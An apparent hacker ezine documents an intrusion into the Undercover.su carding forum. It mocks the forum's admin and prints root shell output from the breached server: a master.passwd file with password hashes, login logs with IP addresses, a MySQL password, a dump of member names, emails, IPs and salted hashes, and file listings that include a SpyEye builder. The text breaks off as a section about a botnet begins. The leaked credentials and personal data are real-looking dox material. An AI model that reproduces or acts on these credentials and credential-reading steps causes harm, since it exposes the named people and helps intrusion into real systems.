+# +# You can uncomment this out on +# non-Windows systems. +;user nobody +;group nogroup + +# The persist options will try to avoid +# accessing certain resources on restart +# that may no longer be accessible because +# of the privilege downgrade. +persist-key +persist-tun + +# Output a short status file showing +# current connections, truncated +# and rewritten every minute. +status /dev/null +#status.log + +# By default, log messages will go to the syslog (or +# on Windows, if running as a service, they will go to +# the "\Program Files\OpenVPN\log" directory). 
+# Use log or log-append to override this default. +# "log" will truncate the log file on OpenVPN startup, +# while "log-append" will append to it. Use one +# or the other (but not both). +log /dev/null +;log-append openvpn.log + +# Set the appropriate level of log +# file verbosity. +# +# 0 is silent, except for fatal errors +# 4 is reasonable for general usage +# 5 and 6 can help to debug connection problems +# 9 is extremely verbose +verb 0 + +# Silence repeating messages. At most 20 +# sequential messages of the same message +# category will be output to the log. +;mute 20 + +crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem + +$ cat /etc/sockd.conf +# $Id: sockd.conf,v 1.49 2009/10/27 11:56:55 karls Exp $ +# +# A sample sockd.conf +# +# +# The configfile is divided into three parts; +# 1) serversettings +# 2) rules +# 3) routes +# +# The recommended order is: +# Serversettings: +# logoutput +# internal +# external +# method +# clientmethod +# users +# compatibility +# extension +# timeout +# srchost +# +# Rules: +# client block/pass +# from to +# libwrap +# log +# +# block/pass +# from to +# method +# command +# libwrap +# log +# protocol +# proxyprotocol +# +# Routes: + +# the server will log both via syslog, to stdout and to /var/log/lotsoflogs +#logoutput: syslog stdout /var/log/lotsoflogs +logoutput: /dev/null + +# The server will bind to the address 10.1.1.1, port 1080 and will only +# accept connections going to that address. +internal: 92.241.190.253 port = 14421 +# Alternatively, the interface name can be used instead of the address. +#internal: eth0 port = 1080 + +# all outgoing connections from the server will use the IP address +# 195.168.1.1 +external: 92.241.190.253 + +# list over acceptable methods, order of preference. +# A method not set here will never be selected. +# +# If the method field is not set in a rule, the global +# method is filled in for that rule. +# + +# methods for socks-rules. 
+method: username +#none #rfc931 + +# methods for client-rules. +#clientmethod: none + +#or if you want to allow rfc931 (ident) too +#method: username rfc931 none + +#or for PAM authentification +#method: pam + +# +# User identities, an important section. +# + +# when doing something that can require privilege, it will use the +# userid "sockd". +#user.privileged: sockd + +# when running as usual, it will use the unprivileged userid of "sockd". +#user.unprivileged: sockd + +# If you compiled with libwrap support, what userid should it use +# when executing your libwrap commands? "libwrap". +#user.libwrap: libwrap + + +# +# Some options to help clients with compatibility: +# + +# when a client connection comes in the socksserver will try to use +# the same port as the client is using, when the socksserver +# goes out on the clients behalf (external: IP address). +# If this option is set, Dante will try to do it for reserved ports aswell. +# This will usually require user.privileged to be set to "root". +#compatibility: sameport + +# If you are using the bind extension and have trouble running servers +# via the server, you might try setting this. The consequences of it +# are unknown. +#compatibility: reuseaddr + +# +# The Dante server supports some extensions to the socks protocol. +# These require that the socks client implements the same extension and +# can be enabled using the "extension" keyword. +# +# enable the bind extension. +#extension: bind + + +# +# Misc options. +# + +# how many seconds can pass from when a client connects til it has +# sent us it's request? Adjust according to your network performance +# and methods supported. +#timeout.negotiate: 30 # on a lan, this should be enough. + +# how many seconds can the client and it's peer idle without sending +# any data before we dump it? Unless you disable tcp keep-alive for +# some reason, it's probably best to set this to 0, which is +# "forever". +timeout.io: 0 # or perhaps 86400, for a day. 
+ +# do you want to accept connections from addresses without +# dns info? what about addresses having a mismatch in dnsinfo? +#srchost: nounknown nomismatch + +# +# The actual rules. There are two kinds and they work at different levels. +# +# The rules prefixed with "client" are checked first and say who is allowed +# and who is not allowed to speak/connect to the server. I.e the +# ip range containing possibly valid clients. +# It is especially important that these only use IP addresses, not hostnames, +# for security reasons. +# +# The rules that do not have a "client" prefix are checked later, when the +# client has sent its request and are used to evaluate the actual +# request. +# +# The "to:" in the "client" context gives the address the connection +# is accepted on, i.e the address the socksserver is listening on, or +# just "0.0.0.0/0" for any address the server is listening on. +# +# The "to:" in the non-"client" context gives the destination of the clients +# socksrequest. +# +# "from:" is the source address in both contexts. +# + + +# +# The "client" rules. All our clients come from the net 10.0.0.0/8. +# + +# Allow our clients, also provides an example of the port range command. +client pass { + from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0 + #method: rfc931 # match all idented users that also are in passwordfile +} + +# This is identical to above, but allows clients without a rfc931 (ident) +# too. In practise this means the socksserver will try to get a rfc931 +# reply first (the above rule), if that fails, it tries this rule. +#client pass { +# from: 10.0.0.0/8 port 1-65535 to: 0.0.0.0/0 +#} + + +# drop everyone else as soon as we can and log the connect, they are not +# on our net and have no business connecting to us. This is the default +# but if you give the rule yourself, you can specify details. 
+#client block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# log: connect error +#} + + +# the rules controlling what clients are allowed what requests +# + +# you probably don't want people connecting to loopback addresses, +# who knows what could happen then. +#block { +# from: 0.0.0.0/0 to: lo0 +# log: connect error +#} + +# the people at the 172.16.0.0/12 are bad, no one should talk to them. +# log the connect request and also provide an example on how to +# interact with libwrap. +#block { +# from: 0.0.0.0/0 to: 172.16.0.0/12 +# libwrap: spawn finger @%a +# log: connect error +#} + +# unless you need it, you could block any bind requests. +#block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# command: bind +# log: connect error +#} + +# or you might want to allow it, for instance "active" ftp uses it. +# Note that a "bindreply" command must also be allowed, it +# should usually by from "0.0.0.0/0", i.e if a client of yours +# has permission to bind, it will also have permission to accept +# the reply from anywhere. +pass { + from: 0.0.0.0/0 to: 0.0.0.0/0 +# command: bind +# log: connect error +} + +# some connections expect some sort of "reply", this might be +# the reply to a bind request or it may be the reply to a +# udppacket, since udp is packetbased. +# Note that nothing is done to verify that it's a "genuine" reply, +# that is in general not possible anyway. The below will allow +# all "replies" in to your clients at the 10.0.0.0/8 net. +#pass { +# from: 0.0.0.0/0 to: 10.0.0.0/8 +# command: bindreply udpreply +# log: connect error +#} + + +# pass any http connects to the example.com domain if they +# authenticate with username. +# This matches "example.com" itself and everything ending in ".example.com". +#pass { +# from: 10.0.0.0/8 to: .example.com port = http +# log: connect error +# method: username +#} + + +# block any other http connects to the example.com domain. 
+#block { +# from: 0.0.0.0/0 to: .example.com port = http +# log: connect error +#} + +# everyone from our internal network, 10.0.0.0/8 is allowed to use +# tcp and udp for everything else. +#pass { +# from: 10.0.0.0/8 to: 0.0.0.0/0 +# protocol: tcp udp +#} + +# last line, block everyone else. This is the default but if you provide +# one yourself you can specify your own logging/actions +#block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# log: connect error +#} + +# route all http connects via an upstream socks server, aka "server-chaining". +#route { +# from: 10.0.0.0/8 to: 0.0.0.0/0 port = http via: socks.example.net port = socks +#} + + +All in all this really shouldn't surprise anyone. Carders.cc was told +to fuck off twice now and we're tired of cleaning their shit up. +Seriously, it's not a secret that carders.cc's team members are a bit +dim, though even they should have got the hint by now. Why don't you +go out, steal some handbags or whatever scum does at your age? This is +not only a warning to you but also to your users; don't put your trust +in admins that are that fucking incapable, because if you do, you will +be owned and your data will be exp0sed. - AGAIN - + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========{ Undercover.su }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ k!LLu, well, what can be said about him? He's +,;' \ /-(.;, ) probably the most attention-whoring and at the + ) / ) / same time the most hated kid around. He spends + // || his time lurking around on kiddyboards, bragging + )_\ )_\ about his imaginary achievements and skills. He +changes his nickname more frequently than his underwear but usually +gets uncovered instantly due to his obtrusive arrogance and stupidity. +All in all he is hands-down the most annoying little brat around. +Clearly, this self-proclaimed hosting-pro and his most recent strokes +of genius "Secure-Host", "Undercover.su" and "Snap Reloaded" have to +be dealt with. 
k!LLu aka s1mpl3x aka purplera1n gave his best to make +his board ("application only") look more private and exclusive than a +dinner with the president. Probably this is why even Fukushima looks +crowded compared to undercover.su. But what can we say? He begged for +it so we owned him anyway; in fact we're presenting you all of his +"projects" torn to pieces. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: erstens | +| k!LLu: entscheide ich ob es ein board gibt oder nich | +|____________________________________________________________________| + +k!LLu decides if a messageboard exists or not! It's no secret that +he is a bit delusional and tends to get stuff mixed up. But, admit +it, his ramblings are kind of fun to read and we look forward to +seeing what he comes up with to explain him being owned and exposed. + ___________________________________________________________________ _ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: profis ???? | +| LOOOOOOOOOL | +| | +| 1337Crew, Public lücke in der SB | +| Carders, Public lücke im SMF | +| Carders #2 , [0-day]24.12.2010 vbulletin 4.0p1Exploit | +| | +| scriptkiddys.... nothing serverside... | +| | +| wäre ich früher aufgestanden hätte dort undercover | +| gestanden :/ | +| | +| Die Admins sind einfach zu daemlich.... | +| Crimenetwork -- MostHated&Unhacked | +|____________________________________________________________________| + +k!LLu basically says that 1337crew and carders.cc were hacked with +public exploits by amateurs. 
He would have done it himself if he +hadn't slept so long. + +The main question here is whether he himself believes this bullshit. +But seriously, he can't be that dumb. Crimenetwork, the predecessor of +undercover.su, was destined to fail from the beginning since k!LLu has +always been trying to create the image of the knowledgeable hacker and +admin he clearly is not. To promote his projects he apparently doesn't +back off from talking about public vulnerabilities that never existed +or exploits he'd never get his hands on. It must be really depressing +to have never even seen or possesed a 0day when one is immensely +desperate to make others believe so. The sad thing actually is that +his constant lying is believed by people incapable of checking simple +facts. But just imagine this poor little guy trying to insult the +hackers who are just watching him typing it, failing to understand +that he is just one of many Trumans in our show. We hope that this +ezine can once and for all depict k!LLu as the cocky kid he is. + +When trying not to puke while surfing Undercover.su we stumbled upon +some rumors. One of which stated that we are Global Evolution - a +private little German fag community that tries to explain security +vulnerabilities by blogging videos about XSS. No we're not Global +Evolution. If anything, we are evolution. We lend a hand to natural +selection, by helping to wipe out the weak ones. And, believe us or +not, k!LLu and his projects deserve to be wiped out more than anybody +or anything else. We keep the show going ... 
+ +# uname -a +FreeBSD 8.2-RELEASE-p3 #4: Thu Sep 29 14:54:55 MSD 2011 + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +ucsu:*:1002:1002:User &:/home/ucsu:/usr/local/bin/bash +true:*:1003:1003:User &:/home/true:/sbin/nologin +symb:*:1006:1006:User &:/home/symb:/bin/sh +hosting:*:1008:1008:User &:/home/hosting:/sbin/nologin +gtbros:*:1001:1001:User &:/home/gtbros:/sbin/nologin +relite:*:1007:1007:User &:/home/relite:/bin/sh +wayne:*:1004:1004:User &:/home/wayne:/sbin/nologin 
+ixde:*:1009:1009:User &:/home/ixde:/sbin/nologin +backspace:*:1005:1005:User &:/home/backspace:/bin/sh +lcf:*:1000:1000:User &:/home/lcf:/bin/sh + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:$1$bqzBFX0T$LkqVd6ktOTUX0qtY3W8fA1:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +ucsu:$1$rkQkyHD4$SPar9t/apgqXI9iBUBSh/0:1002:1002::0:0:User &:/home/ucsu:/usr/local/bin/bash +true:$1$bWcK0H74$NTULoy82dfWaevrF2Hf.T/:1003:1003::0:0:User &:/home/true:/sbin/nologin 
+symb:$1$Lx5.ll9w$uMdF6FKqh4TuC5QuazVQ31:1006:1006::0:0:User &:/home/symb:/bin/sh +hosting:$1$ptOUAPmM$7N/IB1xCXt9x.ft34Dlk/.:1008:1008::0:0:User &:/home/hosting:/sbin/nologin +gtbros:$1$atXPT9B1$qNpYOTWDHlcis3ldbFSjg/:1001:1001::0:0:User &:/home/gtbros:/sbin/nologin +relite:$1$c7m4u7CP$P6QVZVnvxhIqvJRAoZ87j0:1007:1007::0:0:User &:/home/relite:/bin/sh +wayne:$1$SCxNrKiE$iA2K05rvKgbGW/yrdqlVn1:1004:1004::0:0:User &:/home/wayne:/sbin/nologin +ixde:$1$te1KzFVe$gRVE863DVX8QmLT.Tpsvp0:1009:1009::0:0:User &:/home/ixde:/sbin/nologin +backspace:$1$ZPiFb/ga$z0cTF3T8CV7m0guoYVsJJ/:1005:1005::0:0:User &:/home/backspace:/bin/sh +lcf:$1$85k5c7VQ$5nqIFiZbOBFD5Z9LTxmd1.:1000:1000::0:0:User &:/home/lcf:/bin/sh + +# last +ixde ftp 94.220.134.71 Tue Oct 11 17:33 - 17:44 (00:10) +ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:27 (00:01) +ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:31 (00:06) +ixde ftp 94.220.134.71 Tue Oct 11 16:37 - 16:41 (00:04) +ixde ftp 94.220.134.71 Tue Oct 11 16:19 - 16:27 (00:07) +ucsu ftp 193.107.17.239 Tue Oct 11 11:31 - 11:32 (00:00) +ixde ftp 94.220.134.71 Mon Oct 10 15:44 - 15:48 (00:03) +ixde ftp 94.220.134.71 Sun Oct 9 20:42 - 20:47 (00:04) +ucsu ftp 77.20.18.64 Sat Oct 8 17:04 - 17:07 (00:03) +ucsu ftp 77.20.18.64 Sat Oct 8 12:57 - 13:00 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 14:18 - 14:21 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 14:01 - 14:06 (00:04) +ixde ftp 217.255.238.21 Fri Oct 7 13:56 - 13:58 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:55 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:57 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:51 - 13:52 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:49 - 13:52 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:47 - 13:48 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:45 - 13:48 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:44 - 13:45 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:42 - 13:44 (00:01) +ixde ftp 94.220.134.71 Fri Oct 7 13:40 - 13:46 (00:05) +ixde ftp 217.255.238.21 Fri Oct 7 13:39 - 
13:45 (00:05) +backspace ftp 217.23.8.127 Wed Oct 5 11:34 - 11:59 (00:24) +ucsu ftp 77.20.18.64 Tue Oct 4 17:10 - 17:13 (00:03) +backspace ftp 95.128.242.224 Mon Oct 3 22:29 - 22:39 (00:10) +true ftp 77.20.18.64 Mon Oct 3 16:59 - 17:00 (00:01) +true ftp 77.20.18.64 Mon Oct 3 16:58 - 16:59 (00:01) +true ftp 77.20.18.64 Mon Oct 3 16:58 - 17:01 (00:03) +true ftp 77.20.18.64 Mon Oct 3 16:54 - 16:57 (00:03) +ixde ftp 94.220.134.71 Mon Oct 3 09:38 - 10:07 (00:29) +ixde ftp 94.220.134.71 Mon Oct 3 09:11 - 09:17 (00:05) +ixde ftp 94.220.134.71 Sun Oct 2 23:04 - 23:04 (00:00) +ixde ftp 94.220.134.71 Sun Oct 2 23:01 - 23:04 (00:03) +ixde ftp 94.220.134.71 Sun Oct 2 22:31 - 22:45 (00:13) +ixde ftp 94.220.134.71 Sun Oct 2 22:29 - 22:45 (00:15) + +# host 77.20.18.64 +64.18.20.77.in-addr.arpa domain name pointer 77-20-18-64-dynip.superkabel.de. + +# there we go^C + +# cd /home/ucsu + +# ls -la + +total 32 +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 2 ucsu www 512 May 6 13:08 abuse.undercover.su +drwxrwx--- 2 ucsu www 512 Aug 16 00:12 delict.cc +drwxrwx--- 2 ucsu www 512 Apr 13 13:04 moneymake.us +drwxrwx--- 3 ucsu www 512 Apr 7 2011 scene-sector.to +drwxrwx--- 2 ucsu www 2048 Oct 11 19:57 temp +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 undercover.su + +# cd abuse.undercover.su + +# ls -la + +total 12 +drwxrwx--- 2 ucsu www 512 May 6 13:08 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 ucsu www 1034 May 6 13:08 index.html + +# cd .. +# cd delict.cc + +# ls -la + +total 100 +drwxrwx--- 2 ucsu www 512 Aug 16 00:12 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 ucsu www 423 Aug 15 23:46 index.php +-rw-r--r-- 1 ucsu www 44909 Aug 16 00:12 mainlogo.png + +# cd .. + +# cd moneymake.us + +# ls -la +total 12 +drwxrwx--- 2 ucsu www 512 Apr 13 13:04 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. 
+-rw-r--r-- 1 root www 261 Apr 13 13:04 index.php + +# cat index.php +<html> +<head> + +<title>Undercover.SU + + + + + + + +Sie werden weitergeleitet... + +# cd .. + +# cd scene-sector.to + +# ls -la +total 16 +drwxrwx--- 3 ucsu www 512 Apr 7 2011 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 root www 261 Apr 5 2011 index.php +drwxr-xr-x 6 root www 512 Apr 9 2011 test +# cd test + +# ls -la + +total 24 +drwxr-xr-x 6 root www 512 Apr 9 2011 . +drwxrwx--- 3 ucsu www 512 Apr 7 2011 .. +drwxrwxrwx 3 root www 512 Apr 7 2011 4234047??hscjfsjdf89ds89898j34jjfdhhs9322jss +drwxr-xr-x 5 root www 512 Apr 7 2011 admin +drwxr-xr-x 3 root www 512 Apr 7 2011 designe +drwxr-xr-x 3 root www 512 Apr 9 2011 img + +# ls -la +total 15032 +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +drwxr-xr-x 8 root www 512 Apr 30 00:07 .trash +-rw-r--r-- 1 root www 1799843 May 5 18:04 SpyEye.Builder.v1.2.99.zip +-rw-r--r-- 1 root www 320512 Jun 6 20:45 back.exe +-rw-r--r-- 1 root www 118784 Jun 6 14:22 backs.exe +-rw-r--r-- 1 root www 4538223 Jun 6 14:45 backspace.rar +-rw-r--r-- 1 root www 7168 May 11 13:26 elite_4.2.exe +drwxr-xr-x 3 ucsu www 512 Sep 29 18:50 files +-rw-r--r-- 1 ucsu www 408 Feb 6 2011 ico.png +-rw-r--r-- 1 ucsu www 1053 Feb 6 2011 icon_icq.png +-rw-r--r-- 1 ucsu www 536 Aug 21 15:59 index.php +-rw-r--r-- 1 root www 515 May 4 10:00 index.php_ +-rw-r--r-- 1 ucsu www 162 Feb 6 2011 index_.html +drwxr-xr-x 12 ucsu www 512 Sep 27 12:59 ipb3 +drwxr-xr-x 2 root www 512 May 4 09:58 ipboard +drwxr-xr-x 21 root www 1024 Apr 16 16:07 ipboard___beta +-rw-r--r-- 1 ucsu www 25474 Feb 6 2011 logo.jpg +-rw-r--r-- 1 ucsu www 4657 Feb 6 2011 logo.png +-rw-r--r-- 1 root www 44909 May 4 09:53 mainlogo.png +drwxr-xr-x 2 root www 512 Jun 6 14:31 private +-rw-r--r-- 1 root www 253952 May 5 16:32 snap.exe +drwxr-xr-x 3 root www 512 Aug 14 22:01 snapshot +-rw-r--r-- 1 root www 118784 Jun 6 14:39 stansecu.exe +drwxr-xr-x 3 root www 512 May 4 11:15 
static +-rw-r--r-- 1 ucsu www 107003 Sep 16 16:20 test.rar +-rw-r--r-- 1 root www 118784 May 18 19:35 v2.exe +-rw-r--r-- 1 root www 118784 May 18 19:35 v3.exe + +# cd private +# ls -la +total 8908 +drwxr-xr-x 2 root www 512 Jun 6 14:31 . +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 .. +-rw-r--r-- 1 root www 4538210 Jun 6 14:32 backspace.rar +-rw-r--r-- 1 root www 44 Jun 6 13:23 index.php + +# cat index.php +Certificate not found. +-- Access prohibited + +Alright, before we continue, lets have a look at some of k!LLu's +enhancements he stated after Undercover.su left its beta status: + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: Fassen wir kurz zusammen, unsere Datenbank enthält nun | +| keine IP Adressen mehr, es ist nahezu unmöglich | +| IP-Adressen mitzuloggen, die Passwörter sind "uncrackbar" | +| gespeichert. Alle Beiträge, E-Mail's, Themen und PM's | +| sind unlesbar verschluesselt. Selbst ein Hack wäre nun | +| völlig egal und sinnfrei! | +|____________________________________________________________________| + +As we can see, it clearly should not be possible to take any advantage +of hacking undercover.su because of its highly encrypted database. 
+ +# grep ucsu /var/log/proftpd-transfer.log | tail +Thu Sep 29 16:57:38 2011 0 77.20.18.64 1994 /home/ucsu/undercover.su/ipb3/public/style_css/css_8/calendar_select.css a _ o r ucsu ftp 0 * c +Thu Sep 29 16:59:00 2011 0 77.20.18.64 79303 /home/ucsu/undercover.su/ipb3/public/style_css/ipb_styles.css a _ i r ucsu ftp 0 * c +Thu Sep 29 17:03:42 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:07:28 2011 0 77.20.18.64 34809 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:08:43 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:08:59 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg a _ d r ucsu ftp 0 * c +Thu Sep 29 17:13:31 2011 0 77.20.18.64 41797 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:17:35 2011 0 77.20.18.64 59481 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:19:14 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 18:49:59 2011 1 77.20.18.64 160997 /home/ucsu/undercover.su/files/design.PNG b _ i r ucsu ftp 0 * c + +Seems like undercover.su/ipb3 is the latest version of k!LLu's project + +# cd ipb3 + +# cat conf_global.php + + +# mysql -u ucsu_ipb ucsu_ipb -p712987asdxyas +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 465217 +Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 
+ +mysql> SELECT member_id, name, email, ip_address, members_pass_hash, members_pass_salt FROM ucsec_members LIMIT 10; ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +| member_id | name | email | ip_address | members_pass_hash | members_pass_salt | ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +| 1 | s1mpl3x | purplera1n@safe-mail.net | 77.20.18.64 | 517cc224929adfa4906328f1ae42bf22 | !4w3= | +| 2 | medi8tor | ace1992@gmx.net | | 4f6f0b6261c8363a71b6fdfdc037610d | J-|`H | +| 3 | usrid3 | usrid3@undercover.su | | 058089135cfab52cc9d1ba6ef32ea202 | 0]qxI | +| 4 | usrid4 | usrid4@undercover.su | | f29637821bb0e05a55dc8ebf9e24e06f | #}(TJ | +| 5 | test | test@mail.de | | 0bb5a87636ebda286ceea9494d48dc12 | 9N2t, | +| 6 | Man4ic | mrajabi@hotmail.de | | f0a77e175ea95c9b24e2e24eba27c51b | Q}lRm | +| 7 | bin | binary@secure-mail.biz | | 8ae8499691d35b04442a6ba87a92a9fa | JM;3! 
| +| 8 | Ixde | angela.krueger@hotmail.de | | 5b7eee531e99f89be45ff928d7e045ab | qfi7X | +| 9 | casy | 76671253@trash-mail.com | | abddc59b20ad591d10b47b02bd70d426 | 4G:(s | +| 10 | soldier16 | musekeule@yahoo.de | | 1079fe12b4d9e3429c8975920c79a161 | *Y$cj | ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +10 rows in set (0.00 sec) + +mysql> SELECT msg_post, msg_ip_address FROM ucsec_message_posts WHERE msg_author_id = 1 LIMIT 1; ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +| msg_post | msg_ip_address | ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +| Meld dich ICQ 83885,
wenn dein Tut haelt was es verspricht kann ich dir auch gerne ne Menge in Bar zukommen lassen -- je nachdem wieviel im Shop ist,
kann 15k Ukash daily nahezu Instant auscashen | 7 | ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# + +WHAT THE FUCK IS THIS GUY TALKING ABOUT?!@# It's driving us insane, +because we thought that hacking Undercover.su would be at least a bit, +a _BIT_, of a challenge. But fucking NO! k!LLu is by far the dumbest +person to be ever slapattacked by us. That's why we were not satisfied +with the simple ownage of Undercover.su and headed over to his other +projects ... + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------====={ k!LLu's Botnet }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +We could now tell you a story about love and ~ | ||( );, +romance, about people dying and fighting as ( ,;.)-\ / ';, +heroes, about people suffering and crying. But \ ( \ ( +instead, we now shall tell you the story of how || \\ +we raped k!LLu and his little botnet to hell and /_( /_( +back. So here it is: . + / \ + _\ /_ + . . (,'v`.) . . + \) ( ) ,' `. ( ) (/ + \`. / `-' `-' \ ,'/ + : ' _______ ' : + | _,-' ,-. `-._ | + |,' ( )__`-'__( ) `.| + (|,-,'-._ _.-`.-.|) + / /<(o )> <(o )>\ \ + : : | | : : + 